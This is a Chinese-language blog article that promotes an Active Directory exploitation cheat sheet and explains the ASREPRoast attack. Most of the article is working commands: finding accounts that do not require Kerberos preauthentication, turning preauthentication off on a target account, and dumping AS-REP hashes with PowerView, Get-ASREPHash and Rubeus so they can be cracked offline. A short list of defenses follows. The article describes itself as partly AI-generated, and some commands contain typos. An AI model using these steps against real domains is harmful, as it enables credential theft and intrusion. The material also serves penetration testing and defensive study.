ASREPRoast技术深度剖析：无需预认证的域用户攻击终极指南

news2026/3/24 5:54:29

ASREPRoast技术深度剖析无需预认证的域用户攻击终极指南【免费下载链接】Active-Directory-Exploitation-Cheat-SheetA cheat sheet that contains common enumeration and attack methods for Windows Active Directory.项目地址: https://gitcode.com/gh_mirrors/ac/Active-Directory-Exploitation-Cheat-SheetActive Directory 环境中ASREPRoast 是一种无需预认证即可获取域用户凭证的强大攻击技术。本文将深入解析 ASREPRoast 的原理、检测方法和防御策略帮助安全人员全面掌握这一攻击向量的应对之道。什么是ASREPRoast攻击 ASREPRoast 利用了 Kerberos 协议中的设计缺陷——当域用户账户禁用需要 Kerberos 预认证选项时攻击者无需提供任何凭证即可请求身份验证服务响应AS-REP并通过离线暴力破解获取用户密码哈希。图ASREPRoast攻击原理示意图形象展示了攻击者如何遛走域凭证如何检测易受攻击的账户在实施 ASREPRoast 攻击前需要先识别域中禁用预认证的用户账户PowerView检测命令Get-DomainUser -PreauthNotRequired -VerboseAD模块检测命令Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth安全提示重点关注普通用户账户机器账户哈希通常不可破解。可使用RDPUsers等过滤器排除机器账户。实施ASREPRoast攻击的完整步骤 1. 检查账户权限使用 PowerView 检查是否有修改账户属性的权限Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match RDPUsers}2. 禁用目标账户预认证若有权限Set-DomainObject -Identity UserAccount -XOR {useraccountcontrol4194304} -Verbose3. 验证设置是否生效Get-DomainUser -PreauthNotRequired -Verbose4. 获取AS-REP哈希使用ASREPRoast工具# 获取特定用户哈希 Get-ASREPHash -UserName UserName -Verbose # 获取所有可攻击用户哈希 Invoke-ASREPRoast -Verbose使用Rubeus工具# 针对所有域用户 Rubeus.exe asreproast /format:hashcat /domain:DomainName /outfile:hashes.txt # 针对特定用户 Rubeus.exe asreproast /user:username /format:john /domain:DomainName /outfile:hashes.txt # 针对特定OU用户 Rubeus.exe asreproast /ou:OUName /format:hashcat /domain:DomainName /outfile:hashes.txt如何防范ASREPRoast攻击 ️启用Kerberos预认证确保所有用户账户启用需要Kerberos预认证选项实施强密码策略使用复杂密码降低哈希被破解的风险定期审计通过AD模块或PowerView定期检查PreauthNotRequired属性监控异常AS-REP请求部署SIEM系统检测大量失败的AS-REP请求总结ASREPRoast攻击因其无需预认证的特性成为域渗透测试中的重要手段。通过本文介绍的检测方法和防御策略安全团队可以有效识别并缓解这一威胁。记住安全防护是一个持续过程定期更新知识和工具是保护Active Directory环境的关键。要获取更多Active Directory安全相关内容请参考项目中的README.md文档其中包含完整的攻击与防御技术清单。【免费下载链接】Active-Directory-Exploitation-Cheat-SheetA cheat sheet that contains common enumeration and attack methods for Windows Active Directory.项目地址: https://gitcode.com/gh_mirrors/ac/Active-Directory-Exploitation-Cheat-Sheet创作声明：本文部分内容由AI辅助生成（AIGC），仅供参考

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2442920.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！